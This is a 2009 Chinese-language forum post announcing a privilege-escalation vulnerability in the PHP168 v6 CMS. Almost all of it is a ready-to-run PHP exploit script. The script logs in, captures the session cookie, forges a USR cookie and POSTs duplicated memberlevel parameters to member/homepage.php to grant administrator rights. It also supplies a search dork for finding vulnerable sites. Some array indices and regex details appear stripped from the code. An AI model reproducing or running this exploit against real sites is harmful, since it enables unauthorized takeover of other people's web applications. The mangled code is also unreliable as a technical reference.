Php168 v6 权限提升漏洞
Php168 v6 权限提升漏洞by Ryat
http://www.wolvez.org
2009-07-17
天天上班,好久没在论坛发贴了...
以前发过一个php168 v2008的权限提升漏洞,这次的漏洞也出在相同的代码段
直接给出exp,里面的一些细节还是有些意思的,有兴趣的同学可以自行分析:)
EXP:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Php168 v6.0 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V6.0"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 5) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv.' host path user pass
host: target server (ip/hostname)
path: path to php168
user: login username
pass: login password
Example:
php '.$argv.' localhost /php168/ ryat 123456
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv;
$path = $argv;
$user = $argv;
$pass = $argv;
$resp = send();
preg_match('/Set-Cookie:\s(passport=({1,4})%09+)/', $resp, $cookie);
if ($cookie)
if (strpos(send(), 'puret_t') !== false)
exit("Expoilt Success!\nYou Are Admin Now!\n");
else
exit("Exploit Failed!\n");
else
exit("Exploit Failed!\n");
function rands($length = 8)
{
$hash = '';
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
$max = strlen($chars) - 1;
mt_srand((double)microtime() * 1000000);
for ($i = 0; $i < $length; $i++)
$hash .= $chars;
return $hash;
}
function send()
{
global $host, $path, $user, $pass, $cookie;
if ($cookie) {
$cookie .= ';USR='.rands()."\t31\t\t";
$cmd = 'memberlevel=1&memberlevel=1&memberlevel=-1';
$message = "POST ".$path."member/homepage.php?uid=$cookieHTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n";
$message .= "Cookie: ".$cookie."\r\n\r\n";
$message .= $cmd;
} else {
$cmd = "username=$user&password=$pass&step=2";
$message = "POST ".$path."do/login.phpHTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
}
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
页:
[1]